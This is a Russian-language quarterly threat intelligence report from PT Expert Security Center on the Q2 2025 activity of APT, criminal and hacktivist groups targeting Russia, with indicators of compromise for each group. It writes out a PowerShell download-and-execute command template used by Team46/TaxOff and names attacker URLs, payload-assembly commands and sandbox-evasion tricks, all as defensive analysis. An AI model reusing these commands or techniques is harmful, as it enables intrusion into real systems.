PT Expert Security Center

Квартальный отчет июнь 2025

Квартальный отчет июнь 2025

Введение

Во втором квартале 2025 года группа киберразведки TI департамента Positive Technologies провела мониторинг и анализ активности хакерских группировок и сообществ, нацеленных на российские компании и организации. В результате сформирован отчет, систематизирующий выявленные инциденты и демонстрирующий примеры цепочек атак: какая группировка и каким образом осуществляет свои операции — от начального проникновения до развертывания вредоносного ПО.

В этом отчете мы стремимся донести результаты исследования до широкого круга читателей: от технических специалистов до руководителей бизнес подразделений. Мы не ставили цель охватить максимально большое количество инцидентов, а отобрали наиболее интересные, по нашему мнению, атаки, которые еще не описаны другими вендорами или рассмотрены под новым углом.

Основой нашего анализа стали данные из открытых источников, а также информация, полученная с помощью внутренних систем департамента Threat Intelligence Positive Technologies. Такой подход позволяет не только реконструировать ход каждой атаки, но и выявить характерные особенности работы хакерских группировок, что существенно повышает эффективность превентивных мер и реагирования на инциденты.

Шпионаж

Team46

Другие названияTaxOff
Prosperous Werewolf
Операция «Форумный тролль»
Начало активности2024
ИнструментыTeam46 Loader, TaxOff Loader, Cobalt Strike, Trinper
География атакРоссия
Атакуемые отраслиГосударственные учреждения
Информационные технологии
Образование
Телекоммуникации
Транспортные компании

В конце марта 2025 года специалисты PT ESC зафиксировали целевую кампанию, в ходе которой злоумышленники с помощью фишингового письма активировали уязвимость CVE-2025-2783 в браузере Chrome. Об этом ранее сообщали коллеги из «Лаборатории Касперского», назвавшие эту операцию «Форумный тролль», однако последующая цепочка заражения осталась без атрибуции.

Рисунок 1. Фишинговое письмо

Рисунок 1. Фишинговое письмо

Рисунок 1. Фишинговое письмо

В ходе нашего исследования мы установили, что при переходе по ссылке эксплойт выводил процесс из песочницы и загружал бэкдор Trinper. Ранее мы установили прямую связь бэкдора Trinper с группировкой TaxOff, о чем подробно рассказали в статье «TaxOff: кажется, у вас... бэкдор».

Изучая эту атаку и инфраструктуру атакующих, мы обнаружили пересечения с группировкой Team46, про которую ранее рассказывали в статье на Хабре: обе группировки применяют одинаковые инструменты и параметры запуска PowerShell-скриптов.

Во всех случаях злоумышленники использовали команду вида

powershell -w <режим окна> -ep Bypass -nop -c "irm <URL> | iex"

Эта команда позволяет скрыть окно исполнения, обойти ограничения политики выполнения и сразу же загрузить и выполнить код с удаленного сервера.

В феврале 2024 года хакеры Team46 запускали скрипт с адреса infosecteam.info/other.php?id, а в сентябре того же года перешли на srv510786.hstgr.cloud/ordinary.php?id. При этом синтаксис и структура URL остались теми же: передача уникального идентификатора жертвы через параметр id и запуск полученного кода командлетом iex.

В октябре 2024 года группировка, называвшая себя TaxOff, применила аналогичную команду: запуск через -w minimized, загрузка скрипта с домена ms-appdata-query.global.ssl.fastly.net/query.php?id и мгновенный вызов iex. Несмотря на смену регистрации опций и адреса, общая логика — «скачать по ссылке и сразу выполнить» — сохранилась без изменений.

При сравнении этой атаки и более ранних операций Team46 мы также отметили схожесть векторов атаки: в обоих случаях злоумышленники рассылали фишинговые письма со ссылками, а также использовали эксплойты нулевого дня для браузеров. В текущей кампании эксплуатируется уязвимость в Chrome (CVE-2025-2783), а в предыдущих операциях Team46 применялся DLL hijacking в «Яндекс Браузере» (CVE-2024-6473), когда вредоносная DLL, помещенная в каталог с более высоким приоритетом загрузки, подменяла легитимный модуль и обеспечивала выполнение произвольного кода с правами браузера.

Единообразие в использовании параметров PowerShell, паттерна URL с параметром id, а также схожие векторы атак указывают на то, что TaxOff, скорее всего, — это переименование или ответвление инфраструктуры Team46. Подробнее об этом вы можете узнать в нашей статье «Team46 и TaxOff: две стороны одной медали».

Доменыmil-by[.]info
primakovreadings[.]info
2025primakovreadings[.]info
primakovreadings2025.info
ads-stream-api-v2.global.ssl.fastly[.]net
fast-telemetry-api.global.ssl.fastly[.]net
browser-time-stats.global.ssl.fastly[.]net
rdp-query-api.global.ssl.fastly[.]net
rdp-statistics-api.global.ssl.fastly[.]net
clip-rdp-api.global.ssl.fastly[.]net
rdp-api-front.global.ssl.fastly[.]net
common-rdp-front.global.ssl.fastly[.]net
front-static-api.global.ssl.fastly[.]net
main-front-api.global.ssl.fastly[.]net
ms-appdata-fonts.global.ssl.fastly[.]net
ms-appdata-main.global.ssl.fastly[.]net
ms-appdata-query.global.ssl.fastly[.]net
IP-адреса185.81.114[.]15
Имена файловtwinapi.dll
winsta.dll
twinapi.dll
WINSTA.dll
AdobeARM.exe
dirlist.exe
ProcessList.exe
ScreenShot.exe
Контрольная сумма5f47e40f3a36cc06bbaec27b063cd195
d69854b4a5c324082e157f04889ba138
d003e812336221db029f02738451215c
ca767542f4af58fc3072e74574725ee3
16f6227f760487a70a3168cf9a497ac3
1b7b4608f2c9e0a4863a00edd60c3b78
dba17d2faa311f28e68477ea5cc1a300
7d3a30dbf4fd3edaf4dde35ccb5cf926
07d2b50cf8ffe13a4722955ea94317aa
f3a70b8073ce2276af75b1cc2f18aced
4b51f3021d8426b8356cd5751ad6ebd0

PseudoGamaredon

Другие названияAwaken Likho
GamaCopy
Core Werewolf
Начало активности2021
ИнструментыUltraVNC, MeshAgent, доставка ВПО через Telegram
География атакРоссия
Беларусь
Атакуемые отраслиВоенно-промышленный комплекс
Государственные учреждения
Исследовательские компании
Промышленность
Телекоммуникации
Энергетика

Группировка PseudoGamaredon на протяжении 2-го квартала 2025 года продолжала активно использовать проверенные тактики социальной инженерии и удаленного доступа для проникновения в сети промышленных и оборонных компаний. Специалисты киберразведки Positive Technologies зафиксировали несколько новых образцов вредоносов, маскируемых под легитимные документы: среди наиболее часто встречающихся названий — «Спецификация 13_ Гидравлика» и «Отсканированные документы — Срочно на доклад продвижение противника [дд_мм_гг]».

Рисунки 2-4. Документ-приманка

После запуска таких файлов жертва видит документ-приманку, в то время как в фоновом режиме на систему устанавливается клиент UltraVNC. Это позволяет злоумышленникам незаметно получить удаленный доступ к рабочей станции и далее перемещаться по корпоративной сети.

Рисунок 5. Запуск VNC с помощью скрипта при открытии документа
Рисунок 5. Запуск VNC с помощью скрипта при открытии документа

Тематика используемых приманок отчетливо указывает на интерес к предприятиям оборонно-промышленного комплекса и смежных отраслей, что согласуется с предыдущими наблюдениями за этой группировкой. При этом общая схема атаки (спам-рассылка, атака через вредоносный файл-приманку, установка VNC-бэкдора) и инструментарий остались без существенных изменений, что позволяет PseudoGamaredon быстро тиражировать свои операции и сохранять непрерывность кампаний даже при непрерывном обновлении антивирусных баз.

Доменыalternativa123[.]ru
pl82[.]ru
tent-lsk[.]ru
siloneq[.]ru
nedvij-gel[.]ru
IP-адреса94.142.140[.]52
80.85.155[.]40
103.71.20[.]195
185.117.153[.]140
185.221.152[.]17
Имена файловСпецификация 13_ Гидравлика 2025
Отсканированные документы — Срочно на доклад продвижение противника 08_06_25
Контрольная суммаbeb45d5b740ac1f52ed552a73502b01f
57fec70f4ac0f3d8b640faf133aac7e0
bce5f46b41063ab8e1075cc77ca7343b
21829394cac736a528267f9054fad3a4
54685b75d32cadf4dfdc3a25e6ed02cb

TA Tolik

Другие названияFairy Wolf
Начало активности2024
ИнструментыUnicorn
География атакРоссия
Атакуемые отраслиГосударственные учреждения
Промышленный сектор
Финансовый сектор
Энергетика

TA Tolik — это условное название группировки, активность которой была впервые зафиксирована в сентябре 2024 года экспертами «Лаборатории Касперского» в рамках описания скрытной кампании с применением ранее неизвестного стилера Unicorn. Целью злоумышленников изначально было целенаправленное хищение конфиденциальных данных, преимущественно из организаций государственного сектора.

Начиная с апреля 2025 года группа киберразведки PT ESC отмечает возобновление активности группировки. Анализ новых образцов вредоноса показал, что в основе деятельности группировки все еще лежит использование Unicorn, злоумышленники внесли лишь косметические изменения — изменили директории и названия скриптов, сохранив логику атаки.

Атаки традиционно начинаются с фишингового письма, внутри которого находится архив с HTA-файлом, маскирующимся под легитимный документ или уведомление от государственных служб. При запуске файл разворачивает на диске жертвы набор VBS-скриптов.

Рисунок 6. Пример фишингового письма
Рисунок 6. Пример фишингового письма

Для закрепления в системе злоумышленники добавляют свои VBS-скрипты в автозагрузку и создают задачи планировщика Windows. Новые записи, маскирующиеся под легитимные программы, автоматически запускают VBS-скрипты для проверки работоспособности и отправки собранных данных на командный сервер. 

Особенность Unicorn-стилера заключается в том, что основная вредоносная логика не находится прямо в теле HTA- или VBS-файлов. Вместо этого скрипты читают зашифрованные команды и модули из нескольких веток реестра, расшифровывают их и динамически загружают в память. Такой подход значительно затрудняет анализ и обнаружение, поскольку никакой подозрительный код не лежит в файлах на диске: он скрыт внутри реестра и активируется только в момент выполнения.

Рисунок 7. VBA-скрипты
Рисунок 7. VBA-скрипты

Во втором квартале в поле зрения группы киберразведки также попали LNK-файлы, устанавливающие связь с C2-сервером teiehram[.]org, зарегистрированным на то же лицо, что и vm-tiktok[.]org, о котором мы писали ранее в нашем Telegram-канале.

Рисунок 8. Whois-информация
Рисунок 8. Whois-информация

Особенность этих ярлыков заключается в явном тестовом характере: они используют параметр -NoExit и вставку Pause, не пытаются скрыть свое выполнение скрытым запуском PowerShell и не удаляют следы после работы. Для обеспечения однократного исполнения злоумышленники задействуют ключ RunOnce вместо Run. 

В описаниях ярлыков также встречаются записи на украинском языке: «Ярлик для запуску PowerShell команди RunScript.lnk», «Ярлик для запуску PowerShell команди» и «Ярлик для запуску PowerShell команди та відкриття Google».

Рисунок 9. Информация об LNK-файле
Рисунок 9. Информация об LNK-файле

При изучении ВПО, рассылаемого группировкой в адреса организаций военно-промышленного комплекса России, также было установлено, что электронный адрес 155ogvbrmp@bk.ru, с которого отправлялись фишинговые письма, привязан к номерной емкости украинского сегмента сети связи.

Рисунок 10. Привязка мобильного номера к адресу электронной почты
Рисунок 10. Привязка мобильного номера к адресу электронной почты

Согласно данным Whois для доменов, используемых группировкой, административный контакт зарегистрирован по адресу Vyshnyakivska 13 в Киеве, Киевская область, а в качестве контактного телефона указан номер +380 684 496 267.

Рисунок 11. Исторический Whois
Рисунок 11. Исторический Whois

Анализ последних модификаций сценариев TA Tolik свидетельствует о том, что злоумышленники активно развивают свои инструменты для расширения покрытия по сбору данных и закрепления в системе.

Доменыopezdol[.]org
teiehram[.]org
IP-адреса188.114.97[.]3
188.114.96[.]3
Имена файловИсх 14322-13 от 27 05 2025 (уведомление)
Исх 14-0554-4 от 09 06 2025 (уведомление о невыполнении соглашения)
Контрольная сумма8bbe0c8f2a1d6fe94a41eb3e01d90866
6d5a097e9407abf91d517fc75d63a23f
1fea1f181d0ded434cd5f488893ce51b

Sapphire Werewolf

Начало активности2024
ИнструментыAmethyst Stealer
География атакРоссия
Атакуемые отраслиГосударственные учреждения
Здравоохранение
Информационные технологии
Образование
Энергетика

Группировка Sapphire Werewolf впервые привлекла к себе внимание в марте 2024 года, когда начался массовый цикл атак с использованием стилера Amethyst Stealer.

Во втором квартале аналитики киберразведки Positive Technologies зафиксировали серию целевых атак группировки Sapphire Werewolf, в ходе которых злоумышленники распространяли вредоносные документы, тщательно упакованные в архивы, а также загруженные через сервис обмена файлами getshared[.]com.

Рисунки 12-13. Документ-приманка

При запуске вредоносный файл сначала проверяет, не выполняется ли он в виртуальной среде, и сравнивает системное время с заранее заданной датой: если расхождение превышает несколько дней, он автоматически завершает работу, чтобы избежать анализа в песочнице. После успешной проверки сигнал об открытии файла отправляется на сервис canarytokens, далее модуль приступает к сбору данных о системе жертвы, выгрузке документов определенных расширений и извлечению информации о сессиях мессенджера Telegram. Все собранные сведения аккумулируются и передаются на командный сервер злоумышленников, при этом для обеспечения скрытности и обхода сетевых ограничений коммуникация может вестись как через специально созданного Telegram-бота @retardio_bot, так и посредством туннелирования через ngrok.

При анализе работы Telegram-бота @retardio_bot, через который осуществляется управление ВПО, установлено, что последняя зафиксированная сессия обмена сообщениями между ботом и оператором состоялась примерно год назад. С тех пор никаких новых запросов, обновлений статуса или подтверждений от оператора не зафиксировано, что позволяет сделать вывод о том, что активное использование этого инструмента приостановлено.

Доменыelk-divine-immensely.ngrok-free[.]app
wondrous-bluejay-lively.ngrok-free[.]app
Telegram-бот@retardio_bot
Имена файловПроизводство_по_делу.exe
Служебная записка.exe
Sluzebnaja_zapiska_o_povishenie.exe
InformacionnijZapros.exe
Контрольная сумма1a2df6d36edf9789ea1261a50cbea7ee
4bf13f1be4c5e79300e9422c51d131f8
565f8d22fa003ac7014d5d8efd8c1a53
3814bcc23d5e8e9fa39c0e2c610aec15

PhaseShifters

Другие названияAngry Likho
Sticky Werewolf
Начало активности2023
ИнструментыMeta Stealer, Ozone RAT, QuasarRAT, Rhadamanthys Stealer, Ande Loader, Sliver, Remcos RAT, Lumma Stealer, DarkTrack RAT, AsyncRAT, Redline, Remcos, njRAT и XWorm
География атакРоссия 
Беларусь 
Польша
Атакуемые отраслиГосударственные учреждения
Исследовательские компании
Промышленность
Строительство
Телекоммуникации
Транспорт
Энергетика

В течение мая специалисты группы киберразведки PT ESC фиксировали возрастание активности хакерской группировки PhaseShifters, направленное на проведение фишинговых кампаний под видом официальных рассылок Министерства науки и высшего образования Российской Федерации. Для реализации этой операции злоумышленники зарегистрировали домен minobnauki[.]ru, MX-запись которого указывает на IP-адрес 193.124.33[.]207. Любопытно, что на том же сервере ранее располагался домен mail.min-prom[.]ru, который PhaseShifters использовали для рассылки фишинговых писем от имени Министерства промышленности и торговли Российской Федерации, что свидетельствует о целенаправленном повторном использовании инфраструктуры.

Рисунок 14. Фишинговое письмо
Рисунок 14. Фишинговое письмо

В теле фишинговых сообщений получателям предлагается загрузить зашифрованный архив, внутри которого обнаруживается вредоносное ПО QuasarRAT, замаскированное под документ формата DOCX.

Рисунок 15. Документ-приманка
Рисунок 15. Документ-приманка

Вместе с основным файлом в архиве содержится отдельный документ-приманка, выполняющий роль вспомогательного приложения и повышающий вероятность успешного запуска эксплойта конечным пользователем.

Рисунок 16. Содержимое архива
Рисунок 16. Содержимое архива

При распаковке и запуске вредоносного модуля QuasarRAT отслеживает наличие в системе продуктов для антивирусной защиты, проверяя ключевые процессы и службы, в частности bdservicehost, SophosHealth, AvastUI, AVGUI, nsWscSvc и ekrn. В зависимости от результатов этих проверок модифицируются параметры последующего запуска вредоноса.

Основная нагрузка QuasarRAT доставляется фрагментами с расширением .adt, которые затем объединяются в единый исполняемый файл при помощи командной инструкции "cmd /c copy /b ...". Пошаговый процесс объединения Quiet.adt, Achievements.adt, Yen.adt и других фрагментов завершается созданием конечного исполняемого файла, после чего начинается этап закрепления угрозы в системе жертвы. Для обеспечения автоматического старта при каждом входе пользователя в операционную систему вредоносное ПО копирует ярлык своего исполняемого файла в пользовательскую папку автозагрузки.

С целью маскировки своей деятельности атакующий процесс создает экземпляр системного бинаря RegAsm.exe, в который затем внедряется код QuasarRAT. Инжектирование позволяет обойти контроль целостности системных файлов и отказаться от использования стандартных путей запуска. После инъекции устанавливается защищенное соединение с командным сервером по адресу 5.8.11[.]119:4782, где размещен сертификат для организации SSL-канала управления, что обеспечивает дополнительный уровень шифрования и затрудняет сетевой детект.

Следует отметить, что описанная C2-инфраструктура ранее уже применялась группировкой PhaseShifters в предыдущих операциях, однако конфигурация серверов тех кампаний опиралась на домены thelightpower.info и crostech.ru. Анализ паттернов регистрации фишинговых доменов показывает, что злоумышленники отдают предпочтение IP-адресам, привязанным к автономной системе AS41745 ("Baykov Ilya Sergeevich").

Доменыmin-prom[.]ru
mail.min-prom[.]ru
superjoke[.]ru
forum-drom[.]ru
cloud-telegram[.]ru
about-sport[.]ru
minobnauki[.]ru
IP-адреса193.124.33[.]207
5.8.11[.]119
Имена файловPrilozenie_k_pis_mu.docx
Pis_mo_zapros_na_predpriatia_OPK.doc.exe.exe
Исходящий от 26.05.2025.7z
Контрольная сумма2b7004cb00d58967c7d6677495d3422e
0bbb3a2ac9ba7d14a784cbc2519fbd64
40ef2615afb15f61072d7cea9b1a856a
681af8a70203832f9b8de10a8d51860a

Rare Werewolf

Другие названияRezet
Librarian Ghouls
Начало активности2019
ИнструментыBlat, Anydesk, XMRig, Mipko Employee Monitor, tuna, ngrok
География атакРоссия
Атакуемые отраслиВоенно-промышленный комплекс
Неправительственные организации
Строительство
Телекоммуникации
Финансовый сектор

В предыдущем квартале на основе нашей аналитики Rare Werewolf была классифицирована как финансово мотивированная киберпреступная группировка. Однако детальный мониторинг ее инфраструктуры и атак показал, что приоритетной задачей этой группы является сбор конфиденциальной информации, а применение майнера XMRig в ряде инцидентов служит лишь вспомогательным механизмом.

На протяжении апреля — июня группа киберразведки фиксировала попытки Rare Werewolf атаковать предприятия военно-промышленного комплекса. Метод остается неизменным: злоумышленники направляют письма с ZIP-архивом, защищенным паролем, указанным в тексте сообщения, что позволяет обойти почтовые фильтры.

Рисунок 17. Фишинговое письмо
Рисунок 17. Фишинговое письмо

Внутри архива содержится SCR-файл, при запуске которого сначала демонстрируется документ-приманка, а затем по скрытому каналу загружается дополнительный архив с PowerShell- и BAT-скриптами.

Рисунок 18. Документ-приманка
Рисунок 18. Документ-приманка

Распаковка осуществляется в скрытую папку, после чего скрипты извлекают дампы реестров SAM и SYSTEM, сканируют локальную сеть и устанавливают AnyDesk для удаленного управления.

Рисунок 19. Скрытая папка с вредоносными скриптами
Рисунок 19. Скрытая папка с вредоносными скриптами

Сканирование по жестко заданным IP-адресам занимает около 9–10 минут, что существенно превышает временные рамки эмуляции в публичных песочницах. Вероятно, задержка призвана затруднить динамический анализ вредоносного ПО.

В июньских семплах замечена попытка перехода с публичного туннелирования через ngrok на собственный обратный SSH-туннель 
с использованием Tuna и штатного sshd в целях повышения скрытности 
и надежности канала связи с C2-сервером.

На протяжении последних месяцев группировка пыталась мимикрировать под российский военный концерн, распространяя вредоносное ПО через домены, максимально сходные с легитимным.

Доменыvniir[.]nl
almaz-antey-info[.]online
antey-almaz-info[.]site
almaz-anley[.]site
autotificate[.]com
IP-адреса92.63.173[.]61
92.63.173[.]57
31.172.74[.]174
Имена файловКоммерческое предложение № 879 от 13.05.2025
Договор на поставку продукции Д0501.2346
Докуметы на поставку, с правками.scr
СХЕМА ОПОВЕЩЕНИЯ РЕЖИМ КОВЕР.docx.scr
Контрольная сумма8ed87e97879cba7b64d61445991312a6
f04aecd527cd9a18176a4f1f7c12e0c3
e337949e7f5e257a38f869599e58e47e
7b02f6bbe04f989db804154e87e5f726

Финансово мотивированные группировки

Werewolves

Другие названияMoonshine Trickster
Lone Wolf
Начало активности2023
ИнструментыLockBit, Meterpreter, Netscan, SoftPerfect Network Scanner, Cobalt Strike
География атакРоссия
Атакуемые отраслиГосударственные учреждения
Промышленный сектор
Телекоммуникации
Транспортные компании
Финансовый сектор
Энергетика

Группировка Werewolves впервые зафиксирована в июне 2023 года, она использует модифицированный шифровальщик LockBit 3 Black, утекшие инструменты Conti, Cobalt Strike Beacon в загрузчиках .doc/.xls, AnyDesk и Netscan для перемещения по сети, а также открытый DLS-сайт для публикации похищенных данных.

В июне аналитики фиксировали фишинговые рассылки группировки Werewolves, направленные на компании из строительного и гостинично-ресторанного сектора.

Атака начинается с фишингового письма, содержащего вложение в формате DOС.

Рисунки 20-22. Фишинговое письмо

При открытии файла активируется эксплуатация уязвимости CVE-2017-0199, что приводит к загрузке RTF-документа с удаленного сервера. Внутри этого RTF-файла срабатывает уязвимость Equation Editor (CVE-2017-11882), позволяющая выполнить произвольный машинный код в системе жертвы.

Рисунок 23. Примеры пустых документов-заглушек
Рисунок 23. Примеры пустых документов-заглушек
Рисунок 24. Документ-приманка
Рисунок 24. Документ-приманка

Далее полезная нагрузка инициирует обращение к сокращенной ссылке на домене yip[.]su, автоматически перенаправляющей на скачивание HTA-файла. 

Это HTML-приложение-стейджер инкапсулирует Beacon-агент Cobalt Strike и загружается через стандартный системный процесс mshta.exe с ранее компрометированных легитимных ресурсов.

Рисунок 25. Встроенный в DOC запрос к внешнему ресурсу
Рисунок 25. Встроенный в DOC запрос к внешнему ресурсу

После запуска агент устанавливает защищенный TLS-канал связи с командно-контрольным сервером, обеспечивая злоумышленникам возможности удаленного управления, перемещения внутри периметра и развертывания дополнительных модулей для устойчивого присутствия в инфраструктуре жертвы.

Доменыbabygangs.albertn[.]ru
praestol[.]su
комплексон[.]рф
armstroy42[.]ru
lieri[.]ru
cba.abc92[.]ru
toolhaus[.]ru
mysterykamchatka[.]ru
clack[.]su
IP-адреса31.207.76[.]246
45.141.233[.]44
83.220.168[.]36
Имена файловрекламация.doc
претензия(исковое).doc
исковое заявление.doc
Контрольная сумма9c52cb726a012cd97a8ba5923a822c64
f9cfd8e78287b2824dd1d17adb7a0cb7
e3827843c0a21fdc4a2781ce58de1e55
f9026fabfb8d131863ad06fd72eb2717

DarkGaboon

Другие названияroom155
Vengeful Wolf
Начало активности2023
ИнструментыN. S., XWorm, Warzone RAT (AveMaria), VenomRAT, Darktrack, DarkCrystal, Stealerium, RevengeRAT, LockBit
География атакРоссия
Атакуемые отраслиНеправительственные организации
Телекоммуникации
Транспортные компании
Финансовый сектор

DarkGaboon — финансово мотивированная хакерская группировка, впервые зафиксированная Positive Technologies в январе 2025 года с операциями, ведущимися с весны 2023 года. Она нацелена на российские компании из банковского, туристического и государственного сектора, а также из сферы ритейла.

В течение второго квартала эксперты Positive Technologies фиксировали атаки, проводимые группировкой DarkGaboon.

Для первоначального проникновения злоумышленники используют массовые фишинговые рассылки на русском языке, в которых адресатам направляются ZIP-архивы с названиями, имитирующими финансовую отчетность и акты сверки.

Рисунок 26. Фишинговое письмо
Рисунок 26. Фишинговое письмо

Внутри архива содержатся RTF-документ-приманка и исполняемый файл формата SCR, замаскированный под PDF, что обеспечивает высокую вероятность открытия вложения сотрудниками бухгалтерии.

Рисунок 27. Информация о сертификате
Рисунок 27. Информация о сертификате
Рисунок 28. Документ-приманка
Рисунок 28. Документ-приманка

Исполняемый модуль представляет собой обфусцированную сборку Revenge RAT или XWorm, упакованную с помощью Themida или .NET Reactor и подписанную поддельным сертификатом под видом российских бухгалтерских компаний. После запуска он закрепляется в системе, устанавливает удаленный доступ и развертывает дроппер, который с помощью сканера N. S. обнаруживает сетевые ресурсы, очищает временные файлы cleanmgr, шифрует данные LockBit 3.0 и оставляет вымогательскую записку на русском языке с эл. почтой для связи, не эксфильтруя информацию и завершая атаку удалением RAT и артефактов через BAT-скрипт. 

Инфраструктурные компоненты кампании включают домены dynamic DNS с «африканскими» названиями (например, kilimanjaro), а также виртуальные Windows-хосты с RDP-доступом, арендованные в американских и сейшельских сетях. Указанный домен room155[.]online, впервые зарегистрированный в марте 2023 года, выступает проксирующим сервером на основе PowerDNS, получившим делегирование порядка 500 субдоменов, что затрудняет идентификацию конечных узлов управления.

Рисунок 29. Инструкция DarkGaboon
Рисунок 29. Инструкция DarkGaboon

Анализ поведения DarkGaboon показывает, что группировка действует автономно и не является аффилиатом RaaS-сервиса LockBit, используя открыто доступную версию шифровальщика без последующей публикации украденных данных. Такой подход позволяет злоумышленникам «затеряться» на фоне множества аналогичных атак, сохраняя при этом фокус на вымогательстве и минимизируя риск раскрытия.

Доменыmyhost.servepics[.]com
myhost.misecure[.]com
kilimanjaro.theworkpc[.]com
IP-адреса196.251.66[.]118
185.185.70[.]85
Имена файловAкт cвepки взaимopacчeтoв пo cocтoянию нa 12.06.2025 гoдa.pdf.scr
Aкт cвepки взaимopacчeтoв пo cocтoянию нa 10.06.2025 гoдa.xlsx.scr
Aкт cвepки взaимopacчeтoв пo cocтoянию нa 14.05.2025 гoдa.scr
Контрольная сумма83caa65afe19715794d05b79795324c9
8216c6dfd7f81fc011aff73384189e93
5cbdd74815ecd5aed597ade5605e4876

DarkWatchman

Другие названияHive0117
Watch Wolf
Начало активности2021
ИнструментыDarkVNC, FakeUpdate, TeamViewer, KillDisk, WebBrowserPassView, DarkWatchman, Buhtrap
География атакРоссия, Казахстан, Армения
Атакуемые отраслиПромышленный сектор
Сельскохозяйственная промышленность
Телекоммуникации
Транспортные компании
Финансовый сектор
Энергетика

Несмотря на общее снижение активности группы DarkWatchman в течение текущего квартала, в апреле 2025 года была зафиксирована фишинговая кампания, полностью соответствующая ранее отработанным злоумышленниками тактикам. Вредоносный контент распространялся посредством массовой рассылки электронных писем, в теле которых содержались обращения с просьбой предоставить документацию. Тематика сообщений была выдержана в нейтральном формате в попытке позиционировать письмо как легитимный деловой запрос.

Рисунок 30. Фишинговое письмо
Рисунок 30. Фишинговое письмо

В качестве прикрепленных файлов злоумышленники использовали архивы с общими названиями «документы», «документация», чтобы снизить подозрительность вложений для конечного пользователя. 

Внутри архива находится вредоносное ПО DarkWatchman — бэкдор, разработанный на языке JavaScript. Архитектура этого ПО предусматривает создание скрытого канала коммуникации с командным сервером и последующую загрузку дополнительных модулей, обеспечивающих расширение функциональности и обеспечение устойчивого присутствия в системе жертвы.

Анализ заголовков электронных писем показал, что доменное имя отправителя alliance-s.ru ранее принадлежало ликвидированной компании ООО «Альянс» (Саратов) и с 2016 года не продлевалось. Повторная активация этого домена злоумышленниками произошла 29 апреля 2025 года, что свидетельствует о целенаправленной подготовке инфраструктуры для фишинговой кампании. В этот же день домен был перенаправлен на немецкий хостинг и настроен для работы основных почтовых протоколов.

Сопоставление временных меток в DNS-записи и конфигурациях почтовых сервисов показывает, что подготовительные работы по развертыванию инфраструктуры проводились с учетом обеспечения устойчивости и анонимности операций.

Доменыalliance-s[.]ru
4ad74aab.biz[.]ua
4ad74aab[.]cfd
4ad74aab[.]xyz
4ad74aab[.]fun
4ad74aab[.]store
4ad74aab[.]online
IP-адреса178.236.253[.]132
185.159.131[.]10
Имена файловДок-ы от 29.04.2025.exe
Документация от 29.04.2025.exe
Ispolnitelniy_List_1180691-25.scr
Контрольная суммаb996ed39687fe735933e66c7c4edc217
bdde5d0dca5afcc33e0ab85d4be9faaa
0d881bb9756c9cd5c8b02ffce576b2ed
d55ca92a8b007d0d6257dd68f519bf46

Хактивизм

Black Owl

Другие названияBO Team
Lifting Zmiy
Hoody Hyena
Начало активности2024
ИнструментыBrockenDoor, Reverse SSH, DarkGate, Remcos, Babuk
География атакРоссия
Атакуемые отраслиГосударственные учреждения
Здравоохранение
Промышленный сектор
Сельскохозяйственная промышленность
Телекоммуникации
Транспортные компании

Позиционируют себя как проукраинские киберактивисты, проводя деструктивные атаки на инфраструктуру российских организаций с использованием программ-шифровальщиков. 

В конце мая специалисты по киберразведке Positive Technologies выявили целевую фишинговую кампанию, приуроченную к транспортно-логистическому форуму: злоумышленники развернули фишинговые домены rzd-partner[.]pro и rzd-partner[.]store, через которые распространяли архив RZD_Forum_28.05.rar с вредоносом семейства BrockenDoor. Внутри архива под видом PDF-документа с программой форума скрывался исполняемый файл «Программа Форума.pdf .exe». 

В имени этого файла после «Программа Форума.pdf» вставлены не обычные ASCII-пробелы, а невидимые пробельные символы Unicode U+205F (medium mathematical space), которые визуально выглядят как тонкие «пропуски», но на самом деле маскируют реальное расширение .exe, затрудняя обнаружение и автоматический анализ.

Рисунок 31. Различие в отображении названий с пробелами и названий со специальными символами
Рисунок 31. Различие в отображении названий с пробелами и названий со специальными символами

При открытии «Формы опроса.pdf.exe» происходит запуск PDF-приманки.

Рисунок 32. Документ-приманка
Рисунок 32. Документ-приманка

Бэкдор BrockenDoor в фоновом режиме устанавливает соединение с C2-сервером 194.190.153[.]198:7194. Набор команд расширен по сравнению с образцами 2024 года, исследованными коллегами из «Лаборатории Касперского».

КомандаПолное названиеЧто делает бэкдор
spiSet Poll-IntervalИзменяет временной интервал, с которым обращается к серверу
rpRun ProgramПолучает бинарный файл, сохраняет его на диск и запускает одним из четырех способов
sdSelf-DeleteУдаляет себя командой
ecExecute CommandВыполняет произвольную команду
rlReflective LoadЗагружает PE-файл прямо в память, не сохраняя на диск, и вызывает его
Доменыrzd-partner[.]pro
rzd-partner[.]store
IP-адреса194.190.153[.]198
Имена файлов«Форма опроса.pdf                                         .exe»
«Программа Форума.pdf                               .exe»
RZD_Forum_28.05.rar
Контрольная суммаccbc459d2e846666111efefbe2343570
09b32f24a829921fe33f008cfa89fbeb
a73283275ba43a96ce0e44a2b4daf392

Хактивизм: массовые взломы сайтов

Группа киберразведки систематически регистрирует факты компрометации российских веб-ресурсов. Как показывают результаты мониторинга, основными объектами злоумышленников становятся небольшие сайты: онлайн-магазины, персональные блоги и региональные информационные порталы. Несмотря на относительно невысокую популярность подобных ресурсов, их взлом может привести к серьезным негативным последствиям как для владельцев, так и для конечных пользователей. В первую очередь это касается несанкционированного доступа к клиентским базам данных, содержащим персональную информацию и историю транзакций, что существенно повышает риски мошенничества и утечки конфиденциальных сведений.

Полученные в результате таких атак привилегии часто используются киберпреступниками для внедрения вредоносного кода, обеспечивающего дальнейшее распространение угроз. В частности, злоумышленники могут маскировать фишинговые страницы под легитимные домены и рассылать целевые электронные письма с предложением перейти по вредоносным ссылкам, что существенно повышает вероятность успешного обмана доверчивых пользователей. 

Анализ данных указывает на то, что некоторые группы, подобные Werewolves, регулярно задействуют скомпрометированные площадки для организации многоступенчатых фишинговых кампаний.

Кроме того, часть участников теневого рынка предпочитает перепродавать полученные доступы третьим лицам. На специализированных форумах и в закрытых телеграм-каналах можно встретить объявления о продаже shell-доступа к серверным ресурсам, а также о реализации похищенных банковских данных.

Так, группа setupp.es ведет публичную деятельность на ресурсе xleet[.]in, где публикует коммерческие предложения по настройке серверов, продаже shell-доступов и банковских данных, извлеченных в ходе атак.

Рисунок 33. Сайт по продаже взломанных доменов
Рисунок 33. Сайт по продаже взломанных доменов

Методики хактивистов включают в себя целенаправленный сбор уязвимостей на уровне веб-приложений, эксплуатацию устаревших плагинов и ошибок конфигурации серверов. После получения доступа злоумышленники модифицируют содержимое целевых страниц, размещая пропагандистские материалы или перенаправляя трафик на поддельные страницы, замаскированные под официальные ресурсы.

Рисунок 34. Заглушка сайта, взломанного иранскими хактивистами
Рисунок 34. Заглушка сайта, взломанного иранскими хактивистами

Заключение

